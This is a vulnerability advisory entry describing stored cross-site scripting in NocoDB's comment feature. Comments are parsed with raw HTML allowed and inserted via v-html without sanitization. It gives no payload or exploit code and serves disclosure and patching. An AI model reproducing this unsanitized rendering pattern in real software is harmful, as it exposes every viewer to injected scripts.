logo

Database

Server side cross-site scripting In nocodb

Description

NocoDB Vulnerable to Stored Cross-site Scripting via Comments

Summary

Comments rendered via v-html without sanitization, enabling stored XSS.

Details

Comments in Comments.vue were parsed by markdown-it with html: true and injected via v-html without DOMPurify. A user with Commenter role can inject arbitrary HTML that executes for all viewers.

Impact

Stored XSS — malicious scripts execute for any user viewing the comment.

Credit

This issue was discovered by an AI agent developed by the GitHub Security Lab and reviewed by GHSL team members @p- (Peter Stockli) and @m-y-mo (Man Yue Mo).

Mitigation

Update Impact

Minimal update. May introduce new vulnerabilities or breaking changes.

Ecosystem
Package
Affected version
Patched versions

Aliases

1. CVE-2026-283972. NVD-2026-283973. OSV-2026-283974. GHSA-rcph-x7mj-54mm5. GCVE-2026-28397

References

1. https://github.com/nocodb/nocodb/security/advisories/GHSA-rcph-x7mj-54mm2. https://github.com/nocodb/nocodb/releases/tag/0.301.3

Does your application use this vulnerable software?

During the free trial, our tools assess your application, identify vulnerabilities, and provide recommendations for their remediation.

FLAT-4PNF0 – Vulnerability | Fluid Attacks Database